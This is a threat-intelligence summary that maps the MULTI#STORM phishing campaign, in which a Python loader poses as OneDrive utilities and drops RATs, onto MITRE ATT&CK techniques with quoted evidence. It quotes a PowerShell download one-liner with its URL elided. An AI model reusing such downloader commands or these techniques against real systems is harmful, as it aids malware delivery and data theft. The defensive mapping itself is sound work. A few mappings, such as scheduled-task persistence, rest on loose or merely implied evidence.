Securonix Threat Labs Security Advisory: New MULTI#STORM Attack Campaign Involving Python-based Loader Masquerading as OneDrive Utilities Dropping Multiple RAT Payloads Using Security Analytics

MITRE Techniques

• [T1566] Phishing – Initial access via phishing email with a OneDrive download link. ‘The attack kicks off like so many others, with a phishing email which has an embedded link. The link references a request for quote which directs the user to a Microsoft OneDrive file for the victim to download.’
• [T1204.002] User Execution: Malicious File – Execution initiated when the user double-clicks REQUEST.js. ‘Assuming that the user double clicks the REQUEST.js file, this is where our code execution begins.’
• [T1059.001] Command and Scripting Interpreter: PowerShell – The loader uses PowerShell one-liners to download and execute files. ‘cmd /c powershell.exe -Command “Invoke-WebRequest -Uri … -OutFile C:UsersPublicLibrariesfiles.pdf”’
• [T1059.007] Command and Scripting Interpreter: JavaScript – The heavily obfuscated REQUEST.js script drives the chain. ‘The JScript file’s code is heavily obfuscated as seen in the figure below.’
• [T1027.010] Obfuscated Files or Information – Obfuscated script and large padding to hinder analysis. ‘The JScript file’s code is heavily obfuscated… and padding at the end of the script using exactly 509992 zero characters.’
• [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence via registry keys to run on startup. ‘Persistence on the host is established by the news.exe binary file by creating two registry keys which will execute upon startup.’
• [T1053.005] Scheduled Task/Job – Indirect persistence mechanisms via scheduled tasks in the broader tooling suite. ‘Creates registry keys which will execute upon startup’ (treated under persistence family in this context).
• [T1573.001] Encrypted Channel: Symmetric Cryptography – Encrypted C2 communications within Warzone RAT. ‘Encrypted C2 communication’ described in the payload features.
• [T1105] Ingress Tool Transfer – OneDrive-based staging of multiple payloads. ‘used Microsoft OneDrive links to stage various payloads.’
• [T1571] Non-Standard Port – RAT payloads connect to IP:Port combinations designed to evade detection. ‘connect directly to an IP:Port combination, with a fake appended .ddns.net URL.’
• [T1041] Exfiltration Over C2 Channel – Covert data exfiltration over C2 (implied by RAT capabilities).
• [T1056.001] Input Capture: Keylogging – RAT capability set includes keylogging among data theft features. ‘Keylogging’ listed in the capability set.
• [T1113] Screen Capture – RAT can capture screens as part of credential theft collection. ‘Screen Capture’ listed in the capability set.
• [T1115] Clipboard Data – Clipboard data access as part of credential theft. ‘Clipboard Data’ listed in the capability set.
• [T1119] Automated Collection – Automated data collection through the RAT.